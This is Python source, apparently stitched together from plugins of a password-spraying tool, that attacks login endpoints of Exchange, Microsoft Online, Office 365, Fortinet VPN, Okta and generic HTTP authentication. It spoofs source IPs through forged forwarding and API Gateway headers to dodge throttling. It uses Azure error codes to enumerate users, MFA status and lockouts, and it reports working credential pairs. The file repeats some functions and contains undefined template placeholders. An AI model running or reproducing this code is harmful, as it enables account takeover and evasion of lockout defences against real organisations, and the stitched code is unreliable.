def testconnect(pluginargs, args, api_dict, useragent):
url = api_dict['proxy_url']
success = True
headers = {
'User-Agent': useragent,
"X-My-X-Forwarded-For" : generate_ip(),
"x-amzn-apigateway-api-id" : generate_id(),
"X-My-X-Amzn-Trace-Id" : generate_trace_id(),
}
resp = requests.get(url, headers=headers, verify=False)
if resp.status_code == 504:
output = "Testconnect: Connection failed, endpoint timed out, exiting"
success = False
else:
output = "Testconnect: Fingerprinting host... Internal Domain name: {domain}, continuing"
if success:
domainname = get_owa_domain(url, "/autodiscover/autodiscover.xml", useragent)
output = output.format(domain=domainname)
pluginargs['domain'] = domainname
return success, output, pluginargs
def ews_authenticate(url, username, password, useragent, pluginargs):
ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
data_response = {
'timestamp': ts,
'username': username,
'password': password,
'success': False,
'change': False,
'2fa_enabled': False,
'type': None,
'code': None,
'name': None,
'action': None,
'headers': [],
'cookies': [],
'sourceip': None,
'throttled': False,
'error': False,
'output': ""
}
spoofed_ip = generate_ip()
amazon_id = generate_id()
trace_id = generate_trace_id()
headers = {
'User-Agent': useragent,
"X-My-X-Forwarded-For": spoofed_ip,
"x-amzn-apigateway-api-id": amazon_id,
"X-My-X-Amzn-Trace-Id": trace_id,
"Content-Type": "text/xml"
}
try:
resp = requests.post("{}/ews/".format(url),
headers=headers,
auth=HttpNtlmAuth(username, password),
verify=False)
if resp.status_code != 401:
data_response['success'] = True
data_response[
'output'] = f"[+] Found credentials, code: {resp.status_code}: {username}:{password}"
else:
data_response['success'] = False
data_response[
'output'] = f"[-] Authentication failed: {username}:{password} (Invalid credentials)"
except Exception as ex:
data_response['error'] = True
data_response['output'] = ex
pass
return data_response
def testconnect(pluginargs, args, api_dict, useragent):
success = True
headers = {
'User-Agent': useragent,
"X-My-X-Forwarded-For": generate_ip(),
"x-amzn-apigateway-api-id": generate_id(),
"X-My-X-Amzn-Trace-Id": generate_trace_id(),
}
resp = requests.get(api_dict['proxy_url'], headers=headers)
if resp.status_code == 504:
output = "Testconnect: Connection failed, endpoint timed out, exiting"
success = False
else:
output = "Testconnect: Connection success, continuting"
return success, output, pluginargs
def testconnect(pluginargs, args, api_dict, useragent):
success = True
headers = {
'User-Agent': useragent,
"X-My-X-Forwarded-For": generate_ip(),
"x-amzn-apigateway-api-id": generate_id(),
"X-My-X-Amzn-Trace-Id": generate_trace_id(),
}
resp = requests.get(api_dict['proxy_url'] + "/remote/login?lang=en",
headers=headers)
if resp.status_code == 504:
output = "Testconnect: Connection failed, endpoint timed out, exiting"
success = False
elif "fortinet" in resp.text:
output = "Testconnect: Verified Fortinet instance, connected"
else:
output = "Testconnect: Warning, Fortinet client not indicated, continuting"
return success, output, pluginargs
def msol_authenticate(url, username, password, useragent, pluginargs):
ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
data_response = {
'timestamp': ts,
'username': username,
'password': password,
'success': False,
'change': False,
'2fa_enabled': False,
'type': None,
'code': None,
'name': None,
'action': None,
'headers': [],
'cookies': [],
'sourceip' : None,
'throttled' : False,
'error' : False,
'output' : ""
}
body = {
'resource': 'https://graph.windows.net',
'client_id': '1b730954-1685-4b74-9bfd-dac224a7b894',
'client_info': '1',
'grant_type': 'password',
'username': username,
'password': password,
'scope': 'openid',
}
spoofed_ip = generate_ip()
amazon_id = generate_id()
trace_id = generate_trace_id()
headers = {
"X-My-X-Forwarded-For" : spoofed_ip,
"x-amzn-apigateway-api-id" : amazon_id,
"X-My-X-Amzn-Trace-Id" : trace_id,
"User-Agent" : useragent,
'Accept': 'application/json',
'Content-Type': 'application/x-www-form-urlencoded'
}
try:
resp = requests.post("{}/common/oauth2/token".format(url), headers=headers, data=body)
data_response['code'] = resp.status_code
if resp.status_code == 200:
data_response['success'] = True
data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password}"
else:
response = resp.json()
error = response["error_description"]
if "AADSTS50126" in error:
data_response['success'] = False
data_response['output'] = f"FAILED. {resp.status_code} Invalid username or password. Username: {username} could exist."
elif "AADSTS50128" in error or "AADSTS50059" in error:
data_response['success'] = False
data_response['output'] = f"FAILED. {resp.status_code} Tenant for account {username} is not using AzureAD/Office365"
elif "AADSTS50034" in error:
data_response['success'] = False
data_response['output'] = f"FAILED. {resp.status_code} The user {username} doesn't exist."
elif "AADSTS50079" in error or "AADSTS50076" in error:
# Microsoft MFA response
data_response['2fa_enabled'] = True
data_response['success'] = True
data_response['code'] = "2FA Microsoft"
data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The response indicates MFA (Microsoft) is in use."
elif "AADSTS50158" in error:
# Conditional Access response (Based off of limited testing this seems to be the response to DUO MFA)
data_response['2fa_enabled'] = True
data_response['success'] = True
data_response['code'] = "2FA Other"
data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The response indicates conditional access (MFA: DUO or other) is in use."
elif "AADSTS50053" in error:
# Locked out account or Smart Lockout in place
data_response['success'] = False
data_response['output'] = f"WARNING! {resp.status_code} The account {username} appears to be locked."
elif "AADSTS50055" in error:
# User password is expired
data_response['change'] = True
data_response['success'] = True
data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The user's password is expired."
else:
# Unknown errors
data_response['success'] = False
data_response['output'] = f"FAILED. {resp.status_code} Got an error we haven't seen yet for user {username}"
except Exception as ex:
data_response['error'] = True
data_response['output'] = ex
pass
return data_response
def template_authenticate(
url, username, password, useragent,
pluginargs): # CHANGEME: replace template with plugin name
ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
# not all of these are used, provided for future dev if needed
# Only ones necessary to return at the moment are:
# error
# output
# success
data_response = {
'timestamp': ts,
'username': username,
'password': password,
'success': False,
'change': False,
'2fa_enabled': False,
'type': None,
'code': None,
'name': None,
'action': None,
'headers': [],
'cookies': [],
'sourceip': None,
'throttled': False,
'error': False,
'output': ""
}
spoofed_ip = generate_ip()
amazon_id = generate_id()
trace_id = generate_trace_id()
# CHANGEME: Add more if necessary
headers = {
'User-Agent': useragent,
"X-My-X-Forwarded-For": spoofed_ip,
"x-amzn-apigateway-api-id": amazon_id,
"X-My-X-Amzn-Trace-Id": trace_id,
}
try:
resp = requests.post("{}/uri".format(url), headers=headers)
if Success:
data_response['success'] = True
data_response['output'] = 'SUCCESS_MESSAGE: => {}:{}'.format(
username, password)
elif Success_but_2fa:
data_response['success'] = True
data_response['output'] = 'SUCCESS_2FA_MESSAGE: => {}:{}'.format(
username, password)
data_response['2fa_enabled'] = True
elif lockout_or_pwd_expired_or_other:
data_response['success'] = False
data_response['output'] = 'ISSUE_MESSAGE: {} => {}:{}'.format(
resp.status_code, username, password)
else: #fail
data_response['success'] = False
data_response['output'] = 'FAILURE_MESSAGE: {} => {}:{}'.format(
resp.status_code, username, password)
data_response['2fa_enabled'] = True
except Exception as ex:
data_response['error'] = True
data_response['output'] = ex
pass
return data_response
def fortinetvpn_authenticate(url, username, password, useragent, pluginargs):
ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
data_response = {
'timestamp': ts,
'username': username,
'password': password,
'success': False,
'change': False,
'2fa_enabled': False,
'type': None,
'code': None,
'name': None,
'action': None,
'headers': [],
'cookies': [],
'sourceip' : None,
'throttled' : False,
'error' : False,
'output' : ""
}
spoofed_ip = generate_ip()
amazon_id = generate_id()
trace_id = generate_trace_id()
# CHANGEME: Add more if necessary
headers = {
'User-Agent': useragent,
"X-My-X-Forwarded-For" : spoofed_ip,
"x-amzn-apigateway-api-id" : amazon_id,
"X-My-X-Amzn-Trace-Id" : trace_id,
'Content-Type': 'application/x-www-form-urlencoded'
}
post_params = {
"ajax" : '1',
'username' : username,
'credential' : password,
'realm' : ''
}
if 'domain' in pluginargs.keys():
post_params['realm'] = pluginargs['domain']
try:
resp = requests.post("{}/remote/logincheck".format(url),data=post_params,headers=headers)
if resp.status_code == 200 and 'redir=' in resp.text and '&portal=' in resp.text:
data_response['success'] = True
data_response['output'] = 'SUCCESS: => {}:{}'.format(username, password)
if 'domain' in pluginargs.keys():
data_response['output'] = data_response['output'] + " Domain: {}".format(pluginargs['domain'])
else: #fail
data_response['success'] = False
data_response['output'] = 'FAILURE: {} => {}:{}'.format(resp.status_code, username, password)
except Exception as ex:
data_response['error'] = True
data_response['output'] = ex
pass
return data_response
def o365_authenticate(url, username, password, useragent, pluginargs):
ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
data_response = {
'timestamp': ts,
'username': username,
'password': password,
'success': False,
'change': False,
'2fa_enabled': False,
'type': None,
'code': None,
'name': None,
'action': None,
'headers': [],
'cookies': [],
'sourceip': None,
'throttled': False,
'error': False,
'output': ""
}
spoofed_ip = generate_ip()
amazon_id = generate_id()
trace_id = generate_trace_id()
headers = {
'User-Agent': useragent,
"X-My-X-Forwarded-For": spoofed_ip,
"x-amzn-apigateway-api-id": amazon_id,
"X-My-X-Amzn-Trace-Id": trace_id,
"Content-Type": "text/xml"
}
try:
r = requests.get("{}/autodiscover/autodiscover.xml".format(url),
auth=(username, password),
headers=headers,
verify=False,
timeout=30)
if r.status_code == 200:
data_response['output'] = "SUCCESS: {username}:{password}".format(
username=username, password=password)
data_response['success'] = True
elif r.status_code == 456:
data_response[
'output'] = "SUCCESS: {username}:{password} - 2FA or Locked".format(
username=username, password=password)
data_response['success'] = True
else:
data_response['output'] = "FAILED: {username}:{password}".format(
username=username, password=password)
data_response['success'] = False
except Exception as ex:
data_response['error'] = True
data_response['output'] = ex
pass
return data_response
def get(self, *_args, **_kwargs):
self.success(data=dict(generate_id=generate_id()))
def httpbrute_authenticate(
url, username, password, useragent,
pluginargs): # CHANGEME: replace template with plugin name
ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
data_response = {
'timestamp': ts,
'username': username,
'password': password,
'success': False,
'change': False,
'2fa_enabled': False,
'type': None,
'code': None,
'name': None,
'action': None,
'headers': [],
'cookies': [],
'sourceip': None,
'throttled': False,
'error': False,
'output': ""
}
spoofed_ip = generate_ip()
amazon_id = generate_id()
trace_id = generate_trace_id()
# CHANGEME: Add more if necessary
headers = {
'User-Agent': useragent,
"X-My-X-Forwarded-For": spoofed_ip,
"x-amzn-apigateway-api-id": amazon_id,
"X-My-X-Amzn-Trace-Id": trace_id,
}
try:
resp = None
full_url = "{}/{}".format(url, pluginargs['uri'])
if pluginargs['auth'] == 'basic':
auth = requests.auth.HTTPBasicAuth(username, password)
resp = requests.get(url=full_url,
auth=auth,
verify=False,
timeout=30)
elif pluginargs['auth'] == 'digest':
auth = requests.auth.HTTPDigestAuth(username, password)
resp = requests.get(url=full_url,
auth=auth,
verify=False,
timeout=30)
else: # NTLM
auth = requests_ntlm.HttpNtlmAuth(username, password)
resp = requests.get(url=full_url,
auth=auth,
verify=False,
timeout=30)
if resp.status_code == 200:
data_response['success'] = True
data_response['output'] = 'SUCCESS: => {}:{}'.format(
username, password)
elif resp.status_code == 401:
data_response['success'] = False
data_response['output'] = 'FAILURE: => {}:{}'.format(
username, password)
else: #fail
data_response['success'] = False
data_response[
'output'] = 'UNKNOWN_RESPONSE_CODE: {} => {}:{}'.format(
resp.status_code, username, password)
except Exception as ex:
data_response['error'] = True
data_response['output'] = ex
pass
return data_response
def okta_authenticate(url, username, password, useragent, pluginargs):
ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
data_response = {
'timestamp': ts,
'username': username,
'password': password,
'success': False,
'change': False,
'2fa_enabled': False,
'type': None,
'code': None,
'name': None,
'action': None,
'headers': [],
'cookies': [],
'sourceip': None,
'throttled': False,
'error': False,
'output': ""
}
raw_body = "{\"username\":\"%s\",\"password\":\"%s\",\"options\":{\"warnBeforePasswordExpired\":true,\"multiOptionalFactorEnroll\":true}}" % (
username, password)
spoofed_ip = generate_ip()
amazon_id = generate_id()
trace_id = generate_trace_id()
headers = {
'User-Agent': useragent,
"X-My-X-Forwarded-For": spoofed_ip,
"x-amzn-apigateway-api-id": amazon_id,
"X-My-X-Amzn-Trace-Id": trace_id,
'Content-Type': 'application/json'
}
try:
resp = requests.post("{}/api/v1/authn/".format(url),
data=raw_body,
headers=headers)
if resp.status_code == 200:
resp_json = json.loads(resp.text)
if resp_json.get(
"status"
) == "LOCKED_OUT": #Warning: administrators can configure Okta to not indicate that an account is locked out. Fair warning ;)
data_response['success'] = False
data_response['output'] = 'FAILED: Locked out {}:{}'.format(
username, password)
data_response['action'] = 'redirect'
elif resp_json.get("status") == "SUCCESS":
data_response['success'] = True
data_response['output'] = 'SUCCESS: => {}:{}'.format(
username, password)
elif resp_json.get("status") == "MFA_REQUIRED":
data_response['2fa_enabled'] = True
data_response['success'] = True
data_response['output'] = "SUCCESS: 2FA => {}:{}".format(
username, password)
elif resp_json.get("status") == "PASSWORD_EXPIRED":
data_response['change'] = True
data_response['success'] = True
data_response[
'output'] = "SUCCESS: password expired {}:{}".format(
username, password)
else:
data_response['success'] = False
data_response[
'output'] = "ALERT: 200 but doesn't indicate success {}:{}".format(
username, password)
elif resp.status_code == 403:
data_response['success'] = False
data_response['code'] = resp.status_code
data_response[
'output'] = "FAILED THROTTLE INDICATED: {} => {}:{}".format(
resp.status_code, username, password)
else:
data_response['success'] = False
data_response['code'] = resp.status_code
data_response['output'] = "FAILED: {} => {}:{}".format(
resp.status_code, username, password)
except Exception as ex:
data_response['error'] = True
data_response['output'] = ex
pass
return data_response